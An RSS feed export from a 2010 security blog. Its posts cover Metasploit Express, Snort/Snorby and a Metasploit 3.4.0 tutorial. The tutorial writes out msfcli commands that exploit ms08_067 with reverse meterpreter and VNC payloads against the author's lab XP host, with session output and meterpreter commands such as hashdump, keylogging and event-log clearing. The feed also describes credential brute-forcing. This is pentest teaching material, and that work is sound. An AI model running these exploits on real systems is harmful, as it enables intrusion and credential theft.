<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HackerTarget.com : Online Security Vulnerability Assessment &#187; Tools</title>
	<atom:link href="http://hackertarget.com/category/tools/feed/" rel="self" type="application/rss+xml" />
	<link>http://hackertarget.com</link>
	<description>Everyone is a target : Test your security now</description>
	<lastBuildDate>Wed, 09 Jun 2010 08:09:08 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>BackTrack used by the NSA</title>
		<link>http://hackertarget.com/2010/06/backtrack-used-by-the-nsa/</link>
		<comments>http://hackertarget.com/2010/06/backtrack-used-by-the-nsa/#comments</comments>
		<pubDate>Wed, 09 Jun 2010 08:09:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[matrix]]></category>
		<category><![CDATA[nmap]]></category>
		<category><![CDATA[nsa]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=606</guid>
		<description><![CDATA[As highlighted over on the backtrack site. It appears the NSA are one of the users of the excellent security testing Linux Distribution that is Back Track.
That is almost as cool as Nmap being used in the Matrix.
The National Security Agency and the Central Security Service tested the five U.S. service academies during the 2009 [...]]]></description>
			<content:encoded><![CDATA[<p>As highlighted over on the <a href="http://www.backtrack-linux.org/backtrack/backtrack-used-by-the-nsa/">backtrack site</a>. It appears the NSA are one of the users of the excellent security testing Linux Distribution that is Back Track.</p>
<p>That is almost as cool as <a href="http://nmap.org/movies.html">Nmap being used in the Matrix</a>.</p>
<blockquote><p>The National Security Agency and the Central Security Service tested the five U.S. service academies during the 2009 Cyber Defense Exercise.Teams were tested on their ability to defend computer networks the students designed themselves. The winner took home the coveted CDX trophy. In an unclassified movie produced by the NSA, we caught a glimpse of BackTrack being used in the CyberDefence 2009 Wargames.</p></blockquote>
<p><a href="http://www.backtrack-linux.org/backtrack/backtrack-used-by-the-nsa/">http://www.backtrack-linux.org/backtrack/backtrack-used-by-the-nsa/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/06/backtrack-used-by-the-nsa/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit Express Review</title>
		<link>http://hackertarget.com/2010/06/metasploit-express-review/</link>
		<comments>http://hackertarget.com/2010/06/metasploit-express-review/#comments</comments>
		<pubDate>Wed, 02 Jun 2010 07:05:18 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[brute force]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[metasploit express]]></category>
		<category><![CDATA[scan]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=579</guid>
		<description><![CDATA[Metasploit Express with Ubuntu
The purchase of Metasploit by Rapid7 last year and the recent release of Metasploit Express has been big news in the security community.
I have finally gotten around to giving it a spin. So what is Metasploit Express? It is a web based front end for Metasploit that provides not only easy access [...]]]></description>
			<content:encoded><![CDATA[<p>Metasploit Express with Ubuntu</p>
<p>The purchase of <a href="http://www.metasploit.com">Metasploit</a> by <a href="http://www.rapid7.com" target="_blank">Rapid7</a> last year and the <a href="http://www.risky.biz/RB149" title="Risky Biz Podcast Interviews HD Moore" alt=""Risky Biz Podcast Interviews HD Moore"">recent release</a> of <a href="http://www.rapid7.com/products/metasploit-express/index.jsp">Metasploit Express</a> has been big news in the security community.</p>
<p>I have finally gotten around to giving it a spin. So what is Metasploit Express? It is a web based front end for <a href="http://www.metasploit.com">Metasploit</a> that provides not only easy access to the underlying tool it also adds reporting and organisation to your penetration testing. Allowing projects to be saved, results stored and tested. </p>
<p>Sure does beat running metasploit and using a flat text file for your project database. <img src='http://hackertarget.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>I grabbed a copy of the Trial Version from the Metasploit website.</p>
<blockquote><p>
#chmod +x metasploit-3.4.0-linux-x64-installer.bin<br />
# ./metasploit-3.4.0-linux-x64-installer.bin
</p></blockquote>
<p>Install was gui based and simple enough. Following the installation I was directed to web based console.</p>
<p><a href="http://hackertarget.com/wp-content/uploads/2010/06/metasploit-express-install.jpg"><img src="http://hackertarget.com/wp-content/uploads/2010/06/metasploit-express-install-300x210.jpg" alt="" title="metasploit-express-install" width="300" height="210" class="aligncenter size-medium wp-image-580" /></a></p>
<p>https://localhost:3790/</p>
<p>Create a user account.</p>
<p>Enter Product Key and Activate with Rapid7.com. A friendly reminder that we are in the world of commercial software.</p>
<p><a href="http://hackertarget.com/wp-content/uploads/2010/06/metasploit-express-project-screen.jpg"><img src="http://hackertarget.com/wp-content/uploads/2010/06/metasploit-express-project-screen-300x285.jpg" alt="" title="metasploit-express-project-screen" width="300" height="285" class="aligncenter size-medium wp-image-581" /></a></p>
<p>Created Test1 and ran the initial scan</p>
<p><a href="http://hackertarget.com/wp-content/uploads/2010/06/initial-scan.jpg"><img src="http://hackertarget.com/wp-content/uploads/2010/06/initial-scan-300x285.jpg" alt="" title="initial-scan" width="300" height="285" class="aligncenter size-medium wp-image-582" /></a></p>
<p>Resource usage is very low during scanning phase. Memory usage considerably less than firefox and barely touched the sides of CPU on my old Core2duo.</p>
<p>Against my 3 hosts I ran the brute force module. All settings are defaults.</p>
<p><a href="http://hackertarget.com/wp-content/uploads/2010/06/metasploit-express-brute-force.jpg"><img src="http://hackertarget.com/wp-content/uploads/2010/06/metasploit-express-brute-force-300x285.jpg" alt="" title="metasploit-express-brute-force" width="300" height="285" class="aligncenter size-medium wp-image-583" /></a></p>
<p>Note the windows host has login Administrator with password test and admin with password. The Linux host has password of test on the root account.</p>
<p>I was surprised that these were not discovered during the brute scans.</p>
<blockquote><p>
I redid the brute force module after changing the root password to &#8220;toor&#8221;. Success! It seems the dictionary may not have been large enough for root / test.</p>
<p><strong>Update: as noted by <a href="http://topsy.com/twitter/hdmoore">HD Moore</a> selecting the deep option rather than default on the brute force would have hit on &#8220;test&#8221;.</strong>
</p></blockquote>
<p>Using the session from the brute forced credentials I was able to gather data from the system with prebuilt scripts and get full access via a shell.</p>
<p>Onto the exploitation module.</p>
<p>Session found on the windows XP host as expected ms08_067 was successfully exploited.</p>
<p>Switching to the session tab (nice that while scans are running you can move about the console) reveals prebuilt modules that can be performed with the session &#8211; collect system data, virtual desktop, access file system, and command shell. These are straight out of meterpreter.</p>
<p><a href="http://hackertarget.com/wp-content/uploads/2010/06/metasploit-express-session1.jpg"><img src="http://hackertarget.com/wp-content/uploads/2010/06/metasploit-express-session1-300x285.jpg" alt="" title="metasploit-express-session1" width="300" height="285" class="aligncenter size-medium wp-image-584" /></a></p>
<p>I grabbed some system data and found the display of the collected data is clear and easy to get to.</p>
<p>Accessing the virtual desktop I was able to connect using a java applet, the other choice to manually use a vnc viewer was also available.</p>
<p>Browsing the file system is all web based, fast and responsive, allowing browsing of the system drives looking for data to snarf.</p>
<p>Lastly direct access to the meterpreter shell is right there, giving you full access to the session through the web console.</p>
<blockquote><p>
Reports linked here<br />
<a href="http://www.hackertarget.com/sample-reports/executive_report_summary.html" target="_blank">Executive Summary </a><br />
<a href="http://www.hackertarget.com/sample-reports/report_detailed.html" target="_blank">Detailed Audit Report</a><br />
<a href="http://www.hackertarget.com/sample-reports/report_compromised.html" target="_blank">Compromised Hosts</a><br />
<a href="http://www.hackertarget.com/sample-reports/report_evidence.html" target="_blank">Collected Evidence</a><br />
<a href="http://www.hackertarget.com/sample-reports/report_services.html" target="_blank">Network Services </a><br />
<a href="http://www.hackertarget.com/sample-reports/report_auth.html" target="_blank">Authentication Tokens</a>
</p></blockquote>
<p>During my testing I did not have a working NexPose Vulnerability Scanner install, however note that this is also an option for enumeration of the vulnerabilities and would be interesting to see in action.</p>
<p>Overall this is a quality product, utilising the underlying framework the web based front end is solid enhancement that is definitely worth the price, whether you are running metasploit on a daily basis and need access to the reporting and backend database or if you run it occasionally within your environment this puts the power of the tool only a few clicks away.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/06/metasploit-express-review/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Metasploit vs Snort as Snorby</title>
		<link>http://hackertarget.com/2010/06/metasploit-vs-snort-as-snorby/</link>
		<comments>http://hackertarget.com/2010/06/metasploit-vs-snort-as-snorby/#comments</comments>
		<pubDate>Wed, 02 Jun 2010 06:47:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[nmap]]></category>
		<category><![CDATA[snorby]]></category>
		<category><![CDATA[snort]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=574</guid>
		<description><![CDATA[Recently I stumbled acorss Snorby, an excellent easy to use implementation of Snort.
It is a new web interface for Snort that is very pretty, but also simple. An excellent introduction to Intrusion Detection Systems, that is not going to scare anyone away.
Now how to I get hold of this I hear you cry&#8230;. head over [...]]]></description>
			<content:encoded><![CDATA[<p>Recently I stumbled acorss <a href="http://www.snorby.org/" target="_blank">Snorby</a>, an excellent easy to use implementation of <a href="http://www.snort.org/" target="_blank">Snort</a>.</p>
<p>It is a new web interface for Snort that is very pretty, but also simple. An excellent introduction to Intrusion Detection Systems, that is not going to scare anyone away.</p>
<p><img src="http://www.cryptolife.org/images/thumb/2/2a/Snorby2.png/242px-Snorby2.png" align="right">Now how to I get hold of this I hear you cry&#8230;. head over here <a href="http://www.cryptolife.org/index.php/Snorby" target="_blank">and grab the preconfigured security appliance</a>.</p>
<p>I downloaded the iso, fired up a virtualbox machine and away it went. Seriously a working Snort install in under 10mins. Nice!</p>
<p>Obviously you want to test your snort, so I fired off an nmap scan with the script option against my Windows XP SP2 test machine.</p>
<blockquote><p>
# nmap -sC 192.168.56.101</p>
<p>Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2010-06-02 10:19 EST<br />
Nmap scan report for 192.168.56.101<br />
Host is up (0.0032s latency).<br />
Not shown: 997 closed ports<br />
PORT    STATE SERVICE<br />
135/tcp open  msrpc<br />
139/tcp open  netbios-ssn<br />
445/tcp open  microsoft-ds<br />
MAC Address: 08:22:22:22:22:22 </p>
<p>Host script results:<br />
|_nbstat: NetBIOS name: ASDF, NetBIOS user: <unknown>, NetBIOS MAC: 22:22:22:22:22:22<br />
| smb-os-discovery:<br />
|   OS: Windows XP (Windows 2000 LAN Manager)<br />
|   Name: WORKGROUP\ASDF<br />
|_  System time: 2010-06-02 10:19:58 UTC-7<br />
|_smbv2-enabled: Server doesn&#8217;t support SMBv2 protocol</p>
<p>Nmap done: 1 IP address (1 host up) scanned in 12.09 seconds
</p></blockquote>
<p><a href="http://hackertarget.com/wp-content/uploads/2010/06/nmap-snorby.jpg"><img src="http://hackertarget.com/wp-content/uploads/2010/06/nmap-snorby-300x146.jpg" alt="" title="nmap-snorby" width="300" height="146" class="alignright size-medium wp-image-576" /></a><br />
Snorby showed me some nice port scan alerts.</p>
<p>Now I was running through <a href="http://hackertarget.com/2010/06/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/">my guide to Metasploit 3.4.0</a> and figured I would see something in Snorby. As shown in the guide I successfully ran metasploit with ms08_067 exploit using a meterpreter payload and a vnc dll injection payload. Gaining full access to the Windows XP SP2 machine.</p>
<p>Snorby (and Snort) results show nothing. </p>
<p>Hmm, Snorby is running with up to date rules from emerging threats and snort. I was quite surprised and will be looking into the reasons for this in the near future. I would have thought I would have triggered something in the snort rules during this exploit.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/06/metasploit-vs-snort-as-snorby/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit 3.4.0 on Ubuntu 10.04 a quick introduction</title>
		<link>http://hackertarget.com/2010/06/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/</link>
		<comments>http://hackertarget.com/2010/06/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/#comments</comments>
		<pubDate>Wed, 02 Jun 2010 05:56:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[rapid7]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=568</guid>
		<description><![CDATA[Perhaps you have heard of metasploit. It is a very powerful exploitation framework developed by HD Moore.
Solid growth has seen an early version that was a few exploits in a perl based wrapper turn into a ruby coded framework that is competing with Core Impact and Canvas in the pen-testing community.
The latest version has recently [...]]]></description>
			<content:encoded><![CDATA[<p>Perhaps you have heard of <a href="http://www.metasploit.com">metasploit</a>. It is a very powerful exploitation framework developed by HD Moore.</p>
<p>Solid growth has seen an early version that was a few exploits in a perl based wrapper turn into a ruby coded framework that is competing with <a href="http://www.coresecurity.com/">Core Impact</a> and <a href="http://www.immunitysec.com/products-canvas.shtml">Canvas</a> in the pen-testing community.</p>
<p>The latest version has recently been released so I thought I would give you a quick and dirty introduction to running it on <a href="http://www.ubuntulinux.org">Ubuntu</a> Linux 10.04. Of course it will run just as easily on <a href="http://fedoraproject.org/">Fedora</a> Linux, Windows or whatever Operating System floats your boat.</p>
<p>Download the framework from <a href="http://www.metasploit.com/framework/download/">http://www.metasploit.com/framework/download/</a></p>
<p>I chose the binary version for 64 bit Linux.</p>
<p>Ruby is not installed by default in Ubuntu so start off with:</p>
<blockquote><p>
apt-get install ruby<br />
chmod +x framework-3.4.0-linux-x86_64.run<br />
 ./framework-3.4.0-linux-x86_64.run<br />
Verifying archive integrity&#8230; All good.<br />
Uncompressing Metasploit Framework v3.4.0-release Installer (64-bit)&#8230;&#8230;..</p>
<p>                     888                           888        d8b888<br />
                     888                           888        Y8P888<br />
                     888                           888           888<br />
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888<br />
888 &#8220;888 &#8220;88bd8P  Y8b888       &#8220;88b88K     888 &#8220;88b888d88&#8243;&#8221;88b888888<br />
888  888  88888888888888   .d888888&#8243;Y8888b.888  888888888  888888888<br />
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.<br />
888  888  888 &#8220;Y8888  &#8220;Y888&#8243;Y888888 88888P&#8217;88888P&#8221; 888 &#8220;Y88P&#8221; 888 &#8220;Y888<br />
                                           888<br />
                                           888<br />
                                           888</p>
<p>Metasploit Framework v3.4.0 Release<br />
    Report Bugs: msfdev@metasploit.com</p>
<p>Warning: A copy of Metasploit already exists at /opt/metasploit3<br />
         continuing this installation will DELETE the previous<br />
         install, including all user-modified files.</p>
<p>Please enter &#8216;yes&#8217; to continue or any other key to abort<br />
Continue (yes/no) > yes</p>
<p>This installer will place Metasploit into the /opt/metasploit3 directory.<br />
Continue (yes/no) > yes<br />
Removing files from the previous installation&#8230;</p>
<p>Extracting the Metasploit operating environment&#8230;</p>
<p>Extracting the Metasploit Framework&#8230;</p>
<p>Installing links into /usr/local/bin&#8230;</p>
<p>Installation complete.</p>
<p>Would you like to automatically update Metasploit?<br />
AutoUpdate? (yes/no) > yes</p>
<p>*** snip ***</p>
<p>Updated to revision 9390.</p>
<p>Launch the Metasploit console by running &#8216;msfconsole&#8217;</p>
<p>Exiting the installer&#8230;<br />
root@testbox:/home/testuser/Downloads# msfconsole</p>
<p>                                  _<br />
                                 | |      o<br />
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_<br />
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |<br />
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/<br />
                           /|<br />
                           \|</p>
<p>       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]<br />
+ &#8212; &#8211;=[ 553 exploits - 264 auxiliary<br />
+ -- --=[ 208 payloads - 23 encoders - 8 nops<br />
       =[ svn r9390 updated today (2010.06.01)</p>
<p>msf > exit
</p></blockquote>
<p>Ok, we now have a working Metasploit, hoorah for us.</p>
<p>Now we want to do a quick exploit of a Windows XP SP2 test machine I have on my network. It is running in Sun Virtual box using Host Only Networking as we will see shortly.</p>
<p>I like to use the command line utility for msf (msfcli) as once you get used to the syntax it is easier and faster. However if you prefer go with the msfconsole.</p>
<p>Running "#msfcli" will list all exploits, payloads and other modules.</p>
<blockquote><p>
#msfcli | grep 08_067<br />
exploit/windows/smb/ms08_067_netapi</p>
<p>Lets hit my windows box with exploit/windows/smb/ms08_067_netapi it is stable and works very well.</p>
<p>#msfcli  exploit/windows/smb/ms08_067_netapi<br />
[*] Please wait while we load the module tree&#8230;<br />
Usage: /opt/metasploit3/msf3/msfcli <exploit_name> <option=value> [mode]<br />
========================================================================</p>
<p>    Mode           Description<br />
    &#8212;-           &#8212;&#8212;&#8212;&#8211;<br />
    (H)elp         You&#8217;re looking at it baby!<br />
    (S)ummary      Show information about this module<br />
    (O)ptions      Show available options for this module<br />
    (A)dvanced     Show available advanced options for this module<br />
    (I)DS Evasion  Show available ids evasion options for this module<br />
    (P)ayloads     Show available payloads for this module<br />
    (T)argets      Show available targets for this exploit module<br />
    (AC)tions      Show available actions for this auxiliary module<br />
    (C)heck        Run the check routine of the selected module<br />
    (E)xecute      Execute the selected module</p>
<p>#msfcli  exploit/windows/smb/ms08_067_netapi O<br />
[*] Please wait while we load the module tree&#8230;</p>
<p>   Name     Current Setting  Required  Description<br />
   &#8212;-     &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;<br />
   RHOST                     yes       The target address<br />
   RPORT    445              yes       Set the SMB service port<br />
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</p>
</blockquote>
<p>Running the following will display all payloads that will work with ms08_067_netapi. I have selected two in the following examples. A reverse meterpreter and a vnc reverse dll injection.<br />
#msfcli exploit/windows/smb/ms08_067_netapi P</p>
<p>My windows box is 192.168.56.101 and my local Ubuntu system is 192.168.56.1.</p>
<blockquote><p>
# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E<br />
[*] Please wait while we load the module tree&#8230;<br />
[*] Started reverse handler on 192.168.56.1:4444<br />
[*] Automatically detecting the target&#8230;<br />
[*] Fingerprint: Windows XP Service Pack 2 &#8211; lang:English<br />
[*] Selected Target: Windows XP SP2 English (NX)<br />
[*] Attempting to trigger the vulnerability&#8230;<br />
[*] Sending stage (748032 bytes) to 192.168.56.101<br />
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050)</p>
<p>meterpreter > run checkvm<br />
[*] Checking if target is a Virtual Machine &#8230;..<br />
[*] This is a Sun VirtualBox Virtual Machine<br />
meterpreter > run getcountermeasure<br />
[*] Running Getcountermeasure on the target&#8230;<br />
[*] Checking for contermeasures&#8230;<br />
[*] 	Possible countermeasure found avgemc.exe C:\Program Files\AVG\AVG9\avgemc.exe<br />
[*] Getting Windows Built in Firewall configuration&#8230;<br />
[*]<br />
[*] 	Domain profile configuration:<br />
[*] 	&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
[*] 	Operational mode                  = Enable<br />
[*] 	Exception mode                    = Enable<br />
[*]<br />
[*] 	Standard profile configuration (current):<br />
[*] 	&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
[*] 	Operational mode                  = Disable<br />
[*] 	Exception mode                    = Enable<br />
[*]<br />
[*] 	Local Area Connection firewall configuration:<br />
[*] 	&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
[*] 	Operational mode                  = Enable<br />
[*]<br />
[*] 	Local Area Connection 2 firewall configuration:<br />
[*] 	&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
[*] 	Operational mode                  = Enable<br />
[*]<br />
[*] Checking DEP Support Policy&#8230;<br />
meterpreter > run get_local_subnets<br />
Local subnet: 10.0.2.0/255.255.255.0<br />
Local subnet: 192.168.56.0/255.255.255.0<br />
meterpreter > help</p>
<p>Core Commands<br />
=============</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    ?             Help menu<br />
    background    Backgrounds the current session<br />
    bgkill        Kills a background meterpreter script<br />
    bglist        Lists running background scripts<br />
    bgrun         Executes a meterpreter script as a background thread<br />
    channel       Displays information about active channels<br />
    close         Closes a channel<br />
    exit          Terminate the meterpreter session<br />
    help          Help menu<br />
    interact      Interacts with a channel<br />
    irb           Drop into irb scripting mode<br />
    migrate       Migrate the server to another process<br />
    quit          Terminate the meterpreter session<br />
    read          Reads data from a channel<br />
    run           Executes a meterpreter script<br />
    use           Load a one or more meterpreter extensions<br />
    write         Writes data to a channel</p>
<p>Stdapi: File system Commands<br />
============================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    cat           Read the contents of a file to the screen<br />
    cd            Change directory<br />
    del           Delete the specified file<br />
    download      Download a file or directory<br />
    edit          Edit a file<br />
    getlwd        Print local working directory<br />
    getwd         Print working directory<br />
    lcd           Change local working directory<br />
    lpwd          Print local working directory<br />
    ls            List files<br />
    mkdir         Make directory<br />
    pwd           Print working directory<br />
    rm            Delete the specified file<br />
    rmdir         Remove directory<br />
    upload        Upload a file or directory</p>
<p>Stdapi: Networking Commands<br />
===========================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    ipconfig      Display interfaces<br />
    portfwd       Forward a local port to a remote service<br />
    route         View and modify the routing table</p>
<p>Stdapi: System Commands<br />
=======================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    clearev       Clear the event log<br />
    drop_token    Relinquishes any active impersonation token.<br />
    execute       Execute a command<br />
    getpid        Get the current process identifier<br />
    getprivs      Get as many privileges as possible<br />
    getuid        Get the user that the server is running as<br />
    kill          Terminate a process<br />
    ps            List running processes<br />
    reboot        Reboots the remote computer<br />
    reg           Modify and interact with the remote registry<br />
    rev2self      Calls RevertToSelf() on the remote machine<br />
    shell         Drop into a system command shell<br />
    shutdown      Shuts down the remote computer<br />
    steal_token   Attempts to steal an impersonation token from the target process<br />
    sysinfo       Gets information about the remote system, such as OS</p>
<p>Stdapi: User interface Commands<br />
===============================</p>
<p>    Command        Description<br />
    &#8212;&#8212;-        &#8212;&#8212;&#8212;&#8211;<br />
    enumdesktops   List all accessible desktops and window stations<br />
    getdesktop     Get the current meterpreter desktop<br />
    idletime       Returns the number of seconds the remote user has been idle<br />
    keyscan_dump   Dump the keystroke buffer<br />
    keyscan_start  Start capturing keystrokes<br />
    keyscan_stop   Stop capturing keystrokes<br />
    screenshot     Grab a screenshot of the interactive desktop<br />
    setdesktop     Change the meterpreters current desktop<br />
    uictl          Control some of the user interface components</p>
<p>Priv: Elevate Commands<br />
======================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    getsystem     Attempt to elevate your privilege to that of local system.</p>
<p>Priv: Password database Commands<br />
================================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    hashdump      Dumps the contents of the SAM database</p>
<p>Priv: Timestomp Commands<br />
========================</p>
<p>    Command       Description<br />
    &#8212;&#8212;-       &#8212;&#8212;&#8212;&#8211;<br />
    timestomp     Manipulate file MACE attributes</p>
<p>meterpreter >  pwd<br />
C:\WINDOWS\system32<br />
meterpreter > cd ..<br />
meterpreter > cd ..<br />
meterpreter > pwd<br />
C:\<br />
meterpreter >  ls</p>
<p>Listing: C:\<br />
============</p>
<p>Mode              Size       Type  Last modified              Name<br />
&#8212;-              &#8212;-       &#8212;-  &#8212;&#8212;&#8212;&#8212;-              &#8212;-<br />
40777/rwxrwxrwx   0          dir   2009-12-22 05:59:31 +1100  $AVG<br />
100777/rwxrwxrwx  0          fil   2009-12-22 05:39:51 +1100  AUTOEXEC.BAT<br />
100666/rw-rw-rw-  0          fil   2009-12-22 05:39:51 +1100  CONFIG.SYS<br />
40777/rwxrwxrwx   0          dir   2010-02-12 15:23:25 +1100  Documents and Settings<br />
100444/r&#8211;r&#8211;r&#8211;  0          fil   2009-12-22 05:39:51 +1100  IO.SYS<br />
40777/rwxrwxrwx   0          dir   2010-02-11 13:11:43 +1100  Inetpub<br />
100444/r&#8211;r&#8211;r&#8211;  0          fil   2009-12-22 05:39:51 +1100  MSDOS.SYS<br />
100555/r-xr-xr-x  47564      fil   2004-08-04 22:00:00 +1000  NTDETECT.COM<br />
40555/r-xr-xr-x   0          dir   2010-04-08 15:57:51 +1000  Program Files<br />
40777/rwxrwxrwx   0          dir   2010-04-09 13:14:56 +1000  RECYCLER<br />
40777/rwxrwxrwx   0          dir   2009-12-22 05:43:08 +1100  System Volume Information<br />
40777/rwxrwxrwx   0          dir   2010-04-09 13:18:19 +1000  WINDOWS<br />
100666/rw-rw-rw-  211        fil   2009-12-22 05:35:20 +1100  boot.ini<br />
100444/r&#8211;r&#8211;r&#8211;  250032     fil   2004-08-04 22:00:00 +1000  ntldr<br />
100666/rw-rw-rw-  301989888  fil   2010-06-01 02:21:17 +1000  pagefile.sys</p>
</blockquote>
<p>The power of the meterpreter is really only limited by your imagination. Keylogging, screen captures, adding accounts, dumping the hashes to be cracked offline&#8230;..</p>
<p>Now for a vnc injection.</p>
<blockquote><p>
# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/vncinject/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E<br />
[*] Please wait while we load the module tree&#8230;<br />
[*] Started reverse handler on 192.168.56.1:4444<br />
[*] Automatically detecting the target&#8230;<br />
[*] Fingerprint: Windows XP Service Pack 2 &#8211; lang:English<br />
[*] Selected Target: Windows XP SP2 English (NX)<br />
[*] Attempting to trigger the vulnerability&#8230;<br />
[*] Sending stage (445440 bytes) to 192.168.56.101<br />
[*] Starting local TCP relay on 127.0.0.1:5900&#8230;<br />
[*] Local TCP relay started.<br />
[*] Launched vnciewer in the background.<br />
Connected to RFB server, using protocol version 3.8<br />
Enabling TightVNC protocol extensions<br />
No authentication needed<br />
Authentication successful<br />
Desktop name &#8220;snipped&#8221;<br />
VNC server default format:<br />
  32 bits per pixel.<br />
  Least significant byte first in each pixel.<br />
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0<br />
Using default colormap which is TrueColor.  Pixel format:<br />
  32 bits per pixel.<br />
  Least significant byte first in each pixel.<br />
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0<br />
Same machine: preferring raw encoding<br />
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1062)</p>
</blockquote>
<p>This should pop up a vnc session with full desktop control of your Windows XP SP2 Host. This is a good dramatic way to show people the power of metasploit and to reinforce the need for patching to your users.</p>
<p>I did a recent demonstration to a group of corporate helpdesk operators and they were quite surprised at just how easy it can be.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/06/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>SET Social Engineering Toolkit</title>
		<link>http://hackertarget.com/2010/05/set-social-engineering-toolkit/</link>
		<comments>http://hackertarget.com/2010/05/set-social-engineering-toolkit/#comments</comments>
		<pubDate>Wed, 05 May 2010 09:35:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[social engineer]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=565</guid>
		<description><![CDATA[This tool and guide to using the tool is an example of how easy client based exploitation has become. When it comes down to it, attacking the client is fast becoming the easiest method to perform a targeted attack against an organisation or company.
For our readers who are not familiar with Metasploit this maybe a [...]]]></description>
			<content:encoded><![CDATA[<p>This tool and guide to using the tool is an example of how easy client based exploitation has become. When it comes down to it, attacking the client is fast becoming the easiest method to perform a targeted attack against an organisation or company.</p>
<p>For our readers who are not familiar with <a href="http://www.metasploit.com/">Metasploit</a> this maybe a little advanced. However you should still be aware of how relatively easy this sort of attack can be. After all the weakest point in most organisations is the end user.</p>
